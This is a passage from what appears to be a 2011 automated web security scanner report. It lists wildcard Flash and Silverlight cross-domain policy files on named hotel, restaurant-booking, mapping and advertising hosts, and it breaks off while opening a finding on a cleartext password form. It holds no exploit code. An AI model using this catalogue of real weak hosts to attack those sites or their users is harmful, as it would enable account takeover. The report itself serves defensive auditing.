Last-Modified: Sat, 17 Sep 2011 01:23:37 GMT
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...
5.6. http://ecn.t2.tiles.virtualearth.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t2.tiles.virtualearth.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ecn.t2.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "8dd9956cd874cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 207
Age: 72520
Date: Mon, 03 Oct 2011 12:56:17 GMT
Last-Modified: Sat, 17 Sep 2011 01:23:37 GMT
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...
5.7. http://ecn.t3.tiles.virtualearth.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t3.tiles.virtualearth.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ecn.t3.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "8dd9956cd874cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 207
Age: 198496
Date: Mon, 03 Oct 2011 12:56:16 GMT
Last-Modified: Sat, 17 Sep 2011 01:23:37 GMT
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...
5.8. http://g-pixel.invitemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://g-pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: g-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 03 Oct 2011 12:52:48 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>
5.9. http://ib.adnxs.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: uuid2=-1; path=/; expires=Mon, 20-Sep-2021 12:52:46 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...
5.10. http://marriottinternationa.tt.omtrdc.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://marriottinternationa.tt.omtrdc.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: marriottinternationa.tt.omtrdc.net

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: application/xml
Date: Mon, 03 Oct 2011 12:55:33 GMT
Accept-Ranges: bytes
ETag: W/"201-1315435999000"
Connection: close
Last-Modified: Wed, 07 Sep 2011 22:53:19 GMT
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...
5.11. http://metrics.marriott.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.marriott.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.marriott.com

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:55:43 GMT
Server: Omniture DC/2.0.0
xserver: www117
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>
5.12. http://o.opentable.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://o.opentable.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: o.opentable.com

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:53:40 GMT
Server: Omniture DC/2.0.0
xserver: www598
Content-Length: 137
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>
5.13. http://opentable.tt.omtrdc.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://opentable.tt.omtrdc.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: opentable.tt.omtrdc.net

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: application/xml
Date: Mon, 03 Oct 2011 12:54:47 GMT
Accept-Ranges: bytes
ETag: W/"201-1315435999000"
Connection: close
Last-Modified: Wed, 07 Sep 2011 22:53:19 GMT
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...
5.14. http://opentable.ugc.bazaarvoice.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://opentable.ugc.bazaarvoice.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: opentable.ugc.bazaarvoice.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml;charset=utf-8
Content-Language: en-US
Date: Mon, 03 Oct 2011 12:55:22 GMT
Content-Length: 230
Connection: close

<?xml version="1.0" encoding="UTF-8"?><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"/><allow-access-from domain="*"/><allow-http-request-headers-from domain="*" heade
...[SNIP]...
5.15. http://reviews.opentable.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://reviews.opentable.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: reviews.opentable.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml;charset=utf-8
Content-Language: en-US
Date: Mon, 03 Oct 2011 12:55:11 GMT
Content-Length: 230
Connection: close

<?xml version="1.0" encoding="UTF-8"?><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"/><allow-access-from domain="*"/><allow-http-request-headers-from domain="*" heade
...[SNIP]...
5.16. https://www2.ncl.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www2.ncl.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www2.ncl.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 29 Sep 2011 05:29:21 GMT
ETag: "a2d0-139-4ae0dca702e40"
X-Ncl-SLog: (null)
Content-Type: text/xml
Cache-Control: max-age=1800
Expires: Mon, 03 Oct 2011 13:33:03 GMT
Date: Mon, 03 Oct 2011 13:03:03 GMT
Content-Length: 313
Connection: close
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:03:03 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:03:03 GMT; path=/; domain=ncl.com

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*"/>
...[SNIP]...
5.17. http://www.opentable.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.opentable.com

Response

HTTP/1.1 200 OK
Content-Length: 428
Content-Type: text/xml
Last-Modified: Fri, 23 Sep 2011 02:11:06 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-08
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:20-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:53:34 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.eyewonder.com" />
<allow-access-from domain="eyewonder.com" />
<allow-access-from domain="*.eyewonder.com" />
<allow-access-from domain="eyewonderlabs.com" />
<allow-access-from domain="*.eyewonderlabs.com" />
...[SNIP]...
5.18. https://www201.americanexpress.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www201.americanexpress.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www201.americanexpress.com

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 13:02:44 GMT
Server: IBM_HTTP_Server
Last-Modified: Tue, 31 Oct 2006 05:38:25 GMT
ETag: "3057-122-cb8e3640"
Accept-Ranges: bytes
Content-Length: 290
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.aexp.com" secure="true" />

...[SNIP]...
<allow-access-from domain="*.americanexpress.com" secure="true" />
...[SNIP]...
5.19. http://cache.marriott.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cache.marriott.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cache.marriott.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server/6.1.0.37 Apache/2.0.47 (Unix) DAV/2
Last-Modified: Sat, 19 Mar 2011 22:27:50 GMT
ETag: "c118-354-679ac580"
Accept-Ranges: bytes
Content-Length: 852
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Content-Type: text/xml
Cache-Control: max-age=2926
Expires: Mon, 03 Oct 2011 13:44:17 GMT
Date: Mon, 03 Oct 2011 12:55:31 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="cache.mi-perftest1.com"/>
   <allow-access-from domain="www.mi-perftest1.com"/>
...[SNIP]...
<allow-access-from domain="www.marriott.com"/>
...[SNIP]...
<allow-access-from domain="www.marriott.de"/>
   <allow-access-from domain="www.marriott.fr"/>
...[SNIP]...
<allow-access-from domain="www.marriotthotels.co.kr"/>
   <allow-access-from domain="www.latinoamerica.marriott.com"/>
...[SNIP]...
5.20. http://www.marriott.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marriott.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.marriott.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server/6.1.0.37 Apache/2.0.47 (Unix) DAV/2
Last-Modified: Sat, 19 Mar 2011 22:27:50 GMT
ETag: "44157-354-679ac580"
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Content-Type: text/xml
Cache-Control: max-age=2391
Expires: Mon, 03 Oct 2011 13:35:19 GMT
Date: Mon, 03 Oct 2011 12:55:28 GMT
Content-Length: 852
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="cache.mi-perftest1.com"/>
   <allow-access-from domain="www.mi-perftest1.com"/>
   <allow-access-from domain="cache.marriott.com"/>
...[SNIP]...
<allow-access-from domain="www.marriott.de"/>
   <allow-access-from domain="www.marriott.fr"/>
...[SNIP]...
<allow-access-from domain="www.marriotthotels.co.kr"/>
   <allow-access-from domain="www.latinoamerica.marriott.com"/>
...[SNIP]...
5.21. https://www.marriott.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.marriott.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.marriott.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server/6.1.0.37 Apache/2.0.47 (Unix) DAV/2
Last-Modified: Sat, 19 Mar 2011 22:27:50 GMT
ETag: "c0dc-354-679ac580"
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Content-Type: text/xml
Cache-Control: max-age=1415
Expires: Mon, 03 Oct 2011 13:19:55 GMT
Date: Mon, 03 Oct 2011 12:56:20 GMT
Content-Length: 852
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="cache.mi-perftest1.com"/>
   <allow-access-from domain="www.mi-perftest1.com"/>
   <allow-access-from domain="cache.marriott.com"/>
...[SNIP]...
<allow-access-from domain="www.marriott.de"/>
   <allow-access-from domain="www.marriott.fr"/>
...[SNIP]...
<allow-access-from domain="www.marriotthotels.co.kr"/>
   <allow-access-from domain="www.latinoamerica.marriott.com"/>
...[SNIP]...
5.22. http://www.marriottvacationclub.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marriottvacationclub.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.marriottvacationclub.com

Response

HTTP/1.0 200 OK
Content-Length: 138
Content-Type: text/xml
Last-Modified: Thu, 10 Mar 2011 15:11:16 GMT
Accept-Ranges: bytes
ETag: "10cce96635dfcb1:4eb1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 13:02:57 GMT
Connection: close
Via: 1.1 mcoatprdslb2 (Juniper Networks Application Acceleration Platform - DX 5.3.2 0)
Set-Cookie: rl-sticky-key=0ace8fd9; path=/; expires=Mon, 03 Oct 2011 13:07:59 GMT

<?xml version="1.0"?>

<cross-domain-policy>

<allow-access-from domain="api.everyscape.com" />

</cross-domain-policy>

6. Silverlight cross-domain policy  previous  next
There are 8 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

6.1. http://dev.virtualearth.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dev.virtualearth.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: dev.virtualearth.net

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Last-Modified: Sun, 18 Sep 2011 00:40:53 GMT
Accept-Ranges: bytes
ETag: "63203e9f9b75cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 12:56:15 GMT
Connection: close
Content-Length: 374

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
<domain uri="http://*"/>
...[SNIP]...
6.2. http://ecn.dev.virtualearth.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.dev.virtualearth.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ecn.dev.virtualearth.net

Response

HTTP/1.0 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Last-Modified: Sun, 18 Sep 2011 00:40:53 GMT
Accept-Ranges: bytes
ETag: "63203e9f9b75cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 12:52:58 GMT
Content-Length: 374
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
<domain uri="http://*"/>
...[SNIP]...
6.3. http://ecn.t0.tiles.virtualearth.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t0.tiles.virtualearth.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ecn.t0.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "92f3dd6d163ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 458
Age: 1548685
Date: Mon, 03 Oct 2011 12:56:17 GMT
Last-Modified: Wed, 06 Jul 2011 19:53:51 GMT
Expires: Thu, 17 Nov 2011 14:44:51 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
...[SNIP]...
6.4. http://ecn.t1.tiles.virtualearth.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t1.tiles.virtualearth.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ecn.t1.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "92f3dd6d163ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 458
Age: 1545110
Date: Mon, 03 Oct 2011 12:56:16 GMT
Last-Modified: Wed, 06 Jul 2011 19:53:51 GMT
Expires: Thu, 17 Nov 2011 15:44:26 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
...[SNIP]...
6.5. http://ecn.t2.tiles.virtualearth.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t2.tiles.virtualearth.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ecn.t2.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "92f3dd6d163ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 458
Age: 1522849
Date: Mon, 03 Oct 2011 12:56:17 GMT
Last-Modified: Wed, 06 Jul 2011 19:53:51 GMT
Expires: Thu, 17 Nov 2011 21:55:28 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
...[SNIP]...
6.6. http://ecn.t3.tiles.virtualearth.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t3.tiles.virtualearth.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ecn.t3.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "92f3dd6d163ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 458
Age: 1545166
Date: Mon, 03 Oct 2011 12:56:16 GMT
Last-Modified: Wed, 06 Jul 2011 19:53:51 GMT
Expires: Thu, 17 Nov 2011 15:43:30 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
...[SNIP]...
6.7. http://metrics.marriott.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.marriott.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.marriott.com

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:55:43 GMT
Server: Omniture DC/2.0.0
xserver: www120
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...
6.8. http://o.opentable.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://o.opentable.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: o.opentable.com

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:53:40 GMT
Server: Omniture DC/2.0.0
xserver: www383
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...
7. Cleartext submission of password  previous  next
There are 18 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

7.1. http://www.kimptonhotels.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kimptonhotels.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.kimptonhotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:52:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 92975


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<title>Kimpton Ho
...[SNIP]...
<!-- KIT SIGN-IN -->
